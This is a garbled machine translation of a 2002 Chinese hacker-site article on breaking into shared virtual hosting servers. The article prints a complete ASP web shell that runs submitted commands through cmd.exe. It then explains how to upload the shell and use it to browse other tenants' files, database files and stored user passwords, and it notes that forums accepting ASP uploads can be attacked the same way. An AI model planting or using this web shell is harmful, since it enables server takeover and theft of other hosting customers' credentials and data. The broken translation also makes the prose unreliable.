Invades the hypothesized main engine simple plan |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> invasion hypothesized main 
                  engine simple plan  Printing

            Invades the hypothesized main engine the simple plan
            Www.cshu.net  2002-12-20  fog rain village 

              Object: 2,,000 types hypothesized main engines
              Afternoon a sudden idea, is uses a ASP procedure (the 1K multi- 
              spots) to break through the entire hypothesized main engine, 
              unexpectedly really can break through the hypothesized main engine 
              according to own idea, but a many worry, if really like this, how 
              can it be that that network weren't the not peaceful date. First 
              lets everybody look at this ASP the procedure:
              <%@ Language=VBScript %>
              <%
              <! -- Declaration variable -->
              Dim oScript
              Dim oScriptNet
              Dim oFileSys, oFile
              Dim szCMD, szTempFile
              <! -- Wrongly defines -->
              On Error Resume Next
              <! -- Establishes COM which you is going to use project -->
              Set oScript = Server.CreateObject ("WSCRIPT.SHELL")
              Set oScriptNet = Server.CreateObject ("WSCRIPT.NETWORK")
              Set oFileSys = Server.CreateObject ("Scripting.FileSystemObject")
              <! -- This defines variable -->
              SzCMD = Request.Form ("CMD")
              If (szCMD "") Then
              <! -- Here is a key, pays attention to, transfers Cmd.exe-->
              SzTempFile = "C:\" & oFileSys.GetTempName ()
              Call oScript.Run ("cmd.exe /c" & szCMD & ">" & szTempFile, 0, 
True)
              Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
              End If
              %>
              <HTML>
              <BODY>
              <FORM action= "<%= Request.ServerVariables ("URL") %>" method= 
              "POST" >
              <input type=text name= "CMD" size=45 value= "<%= szCMD %>" >
              <input type=submit value= "Run" >
              </FORM>
              <PRE>
              <%
              If (IsObject (oFile)) Then
              On Error Resume Next
              Response.Write Server.HTMLEncode (oFile.ReadAll)
              OFile.Close
              Call oFileSys.DeleteFile (szTempFile, True)
              End If
              %>
              </BODY>
              </HTML>
              Regarding the person which does the programming said that, this 
              simply does not calculate difficultly, only is a small back door 
              procedure. But whether has thought this function? Let me say own 
              some mentalities!
              For instance you have bought a space, only is a hypothesized main 
              engine space, perhaps above some 30 websites, or said is 50, even 
              are more. If you pass to in a spatial catalogue above this 
              document, then arrives on the browser to carry out again, you can 
              discover it has this locality to carry out the cmd.exe function, 
              certainly I refer am the common user's function. In the ordinary 
              circumstances, in the hypothesized main engine can retain this 
              kind of backup document user.txt, inside has included some spatial 
              users' materials as well as the password, May say this all was the 
              people is used to it. Calculated you do not have, certainly I also 
              may obtain all all, lets me call for the time being own space are 
              A, then I must see on spatial B had many many things, then I may 
              directly through the dir order search, perhaps you accidentally be 
              able to discover login.asp the document, not bothersomely opens 
              with the type order has a look! Oh, pushes, is very convenient may 
              examine you have wanted database file. Again or, the COPY order 
              said like this mostly does the computer the person can use, you 
              also may his document copy to in your space table of contents, 
              then again download to locally slowly looked. Also has very many 
              orders that to wait for you to go slowly tries to find out, was 
              obtains the main engine the user password also no longer is 
              difficult.
              Specially reminds is the forum, so long as increases in the forum 
              to be allowed on to pass on ASP to choose the project, this main 
              engine also was allowed to use the above method to invade. Asks 
              each big forum to bring to the attention.
              I write this thought, certainly is not is called everybody to do 
              these main engines, but is wants to let the user communities bring 
              to the attention. As a result of refers to the consequence which 
              this article causes to have nothing to do with with the author.


              Original author: . 
              Origin: . 
              Altogether has 235 readers to read this article 

              [Tells friend] 
            Previous article:IDC: Next year the Asian and Pacific 15%IT 
            expenditure will go to the network security 

            Next article:Hacker technology (use of the DEBUG loophole) 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
